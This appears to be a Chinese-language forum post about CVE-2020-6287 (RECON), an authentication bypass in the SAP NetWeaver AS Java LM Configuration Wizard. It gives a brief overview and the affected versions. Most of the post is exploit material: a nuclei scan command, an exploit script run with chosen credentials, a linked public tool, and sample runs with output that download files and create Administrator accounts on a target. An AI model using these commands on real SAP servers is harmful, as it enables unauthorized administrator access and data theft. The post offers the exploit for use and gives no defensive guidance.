- 注册
- 09 10, 2024
- 消息
- 186
JavaScript:
## 漏洞概述
在`SAP NetWeaver AS Java` 的`LM`配置向导中缺乏身份验证,未经身份验证的远程攻击者可以执行有危害的操作,包括但不限于创建管理员用户。攻击者可能获得对`adm`的访问权限,`adm`是操作系统用户,它可以无限制地访问与`SAP`系统相关的所有本地资源。
## 影响范围
```http
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.30
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.31
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.40
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.50
```
## POC
```bash
nuceli -tags sap -t cves/ -l urls.txt
```
## EXP
```bash
python CVE-2020-6287.py http://vul-IP:50000/ test123 test@123123
```
## EXP (RECON.py)
[chipik/SAP_RECON](https://github.com/chipik/SAP_RECON)
Just point SAP NW AS Java hostnmae/ip.
There is additional options:
1. `-c` - check if SAP server is vulnerable to RECON
2. `-f` - download `zip` file from SAP server
3. `-u` - create user SAP JAVA user with `Authenticated User` role
4. `-a` - create user SAP JAVA user with `Administrator` role
Ex.: Download zip file
```bash
python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
```
Ex.: Create SAP JAVA user
```bash
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
```
Ex.: Create SAP JAVA Administrator user
```bash
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
```
